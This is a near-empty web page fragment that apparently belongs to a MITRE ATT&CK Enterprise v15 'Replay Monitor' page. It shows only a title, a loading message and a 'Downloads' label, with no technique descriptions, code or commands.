MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads